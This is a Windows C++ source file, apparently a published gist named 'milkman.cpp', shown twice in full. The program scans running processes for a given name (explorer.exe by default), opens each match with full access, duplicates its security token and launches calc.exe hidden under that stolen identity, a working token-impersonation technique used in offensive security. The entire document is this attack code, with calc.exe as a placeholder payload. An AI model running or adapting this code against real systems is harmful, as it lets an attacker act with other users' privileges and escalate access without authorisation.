mubix/milkman.cpp

## milkman.cpp
#ifndef UNICODE
#define UNICODE
#endif

#include <Windows.h>
#include <string.h>
#include <stdio.h>
#include <Psapi.h>


void perror(DWORD nStatus)
{
	LPVOID lpMsgBuf;
	FormatMessage(
		FORMAT_MESSAGE_ALLOCATE_BUFFER |
		FORMAT_MESSAGE_FROM_SYSTEM |
		FORMAT_MESSAGE_IGNORE_INSERTS,
		NULL,
		nStatus,
		MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
		(LPTSTR)&lpMsgBuf,
		0, NULL);
	wprintf(L"[-] %6d %s\n", nStatus, lpMsgBuf);
	if (lpMsgBuf) {
		LocalFree(lpMsgBuf);
	}
}


int str_ends_with(TCHAR * str, TCHAR * suffix)
{
	if (str == NULL || suffix == NULL)
	{
		return 0;
	}

	size_t str_len = wcslen(str);
	size_t suffix_len = wcslen(suffix);

	if (suffix_len > str_len)
	{
		return 0;
	}

	return 0 == wcscmp(str + str_len - suffix_len, suffix);
}

int start_process(int PID)
{

	TCHAR cmd[512] = TEXT("calc.exe");
	STARTUPINFO startup_info;
	PROCESS_INFORMATION process_information;
	SECURITY_IMPERSONATION_LEVEL impLevel = SecurityImpersonation;
	LPVOID pEnvironment;
	HANDLE hProc = NULL;
	HANDLE hToken = NULL;
	HANDLE hTokenDup = NULL;

	ZeroMemory(&startup_info, sizeof(startup_info));
	startup_info.cb = sizeof(startup_info);
	ZeroMemory(&process_information, sizeof(process_information));
	ZeroMemory(&pEnvironment, sizeof(pEnvironment));

	hProc = OpenProcess(GENERIC_ALL, FALSE, PID);
	//perror(GetLastError());

	OpenProcessToken(hProc, GENERIC_ALL, &hToken);
	//perror(GetLastError());

	ImpersonateLoggedOnUser(hToken);
	//perror(GetLastError());

	DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, impLevel, TokenPrimary, &hTokenDup);
	//perror(GetLastError());

	CreateProcessAsUser(hTokenDup, NULL, cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, &pEnvironment, NULL, &startup_info, &process_information);
	//perror(GetLastError());
	return 0;
}

int find(TCHAR *name)
{
	//wprintf(TEXT("Looking for %s\n"), name);
	DWORD aProcesses[1024], cbNeeded, cProcesses;
	unsigned int i;
	HANDLE hProcessEnum;
	TCHAR szProcessName[MAX_PATH] = TEXT("<unknown>");


	if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded))
	{
		return 1;
	}

	cProcesses = cbNeeded / sizeof(DWORD);

	for (i = 0; i < cProcesses; i++)
	{
		if (aProcesses[i] != 0)
		{
			hProcessEnum = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, aProcesses[i]);
			if (NULL != hProcessEnum)
			{
				GetProcessImageFileName(hProcessEnum, szProcessName, sizeof(szProcessName) / sizeof(TCHAR));
				if (str_ends_with(szProcessName, name))
				{
					//wprintf(TEXT("[+] %d -\t%s\n"), aProcesses[i], szProcessName);
					start_process(aProcesses[i]);
				}
			}

		}
	}
	return 0;
}

int wmain(int argc, TCHAR * argv[])
{
	if (argc > 1 && argv[1])
	{
		find(argv[1]);
		//sperror(GetLastError());
	}
	else
	{
		find(TEXT("explorer.exe"));
		//perror(GetLastError());
	}

	return 0;
}
	#ifndef UNICODE
	#define UNICODE
	#endif

	#include <Windows.h>
	#include <string.h>
	#include <stdio.h>
	#include <Psapi.h>



	void perror(DWORD nStatus)
	{
	LPVOID lpMsgBuf;
	FormatMessage(
	FORMAT_MESSAGE_ALLOCATE_BUFFER \|
	FORMAT_MESSAGE_FROM_SYSTEM \|
	FORMAT_MESSAGE_IGNORE_INSERTS,
	NULL,
	nStatus,
	MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
	(LPTSTR)&lpMsgBuf,
	0, NULL);
	wprintf(L"[-] %6d %s\n", nStatus, lpMsgBuf);
	if (lpMsgBuf) {
	LocalFree(lpMsgBuf);
	}
	}


	int str_ends_with(TCHAR * str, TCHAR * suffix)
	{
	if (str == NULL \|\| suffix == NULL)
	{
	return 0;
	}

	size_t str_len = wcslen(str);
	size_t suffix_len = wcslen(suffix);

	if (suffix_len > str_len)
	{
	return 0;
	}

	return 0 == wcscmp(str + str_len - suffix_len, suffix);
	}

	int start_process(int PID)
	{

	TCHAR cmd[512] = TEXT("calc.exe");
	STARTUPINFO startup_info;
	PROCESS_INFORMATION process_information;
	SECURITY_IMPERSONATION_LEVEL impLevel = SecurityImpersonation;
	LPVOID pEnvironment;
	HANDLE hProc = NULL;
	HANDLE hToken = NULL;
	HANDLE hTokenDup = NULL;

	ZeroMemory(&startup_info, sizeof(startup_info));
	startup_info.cb = sizeof(startup_info);
	ZeroMemory(&process_information, sizeof(process_information));
	ZeroMemory(&pEnvironment, sizeof(pEnvironment));

	hProc = OpenProcess(GENERIC_ALL, FALSE, PID);
	//perror(GetLastError());

	OpenProcessToken(hProc, GENERIC_ALL, &hToken);
	//perror(GetLastError());

	ImpersonateLoggedOnUser(hToken);
	//perror(GetLastError());

	DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, NULL, impLevel, TokenPrimary, &hTokenDup);
	//perror(GetLastError());

	CreateProcessAsUser(hTokenDup, NULL, cmd, NULL, NULL, FALSE, CREATE_NO_WINDOW, &pEnvironment, NULL, &startup_info, &process_information);
	//perror(GetLastError());
	return 0;
	}

	int find(TCHAR *name)
	{
	//wprintf(TEXT("Looking for %s\n"), name);
	DWORD aProcesses[1024], cbNeeded, cProcesses;
	unsigned int i;
	HANDLE hProcessEnum;
	TCHAR szProcessName[MAX_PATH] = TEXT("<unknown>");


	if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded))
	{
	return 1;
	}

	cProcesses = cbNeeded / sizeof(DWORD);

	for (i = 0; i < cProcesses; i++)
	{
	if (aProcesses[i] != 0)
	{
	hProcessEnum = OpenProcess(PROCESS_QUERY_INFORMATION \| PROCESS_VM_READ, FALSE, aProcesses[i]);
	if (NULL != hProcessEnum)
	{
	GetProcessImageFileName(hProcessEnum, szProcessName, sizeof(szProcessName) / sizeof(TCHAR));
	if (str_ends_with(szProcessName, name))
	{
	//wprintf(TEXT("[+] %d -\t%s\n"), aProcesses[i], szProcessName);
	start_process(aProcesses[i]);
	}
	}

	}
	}
	return 0;
	}

	int wmain(int argc, TCHAR * argv[])
	{
	if (argc > 1 && argv[1])
	{
	find(argv[1]);
	//sperror(GetLastError());
	}
	else
	{
	find(TEXT("explorer.exe"));
	//perror(GetLastError());
	}

	return 0;
	}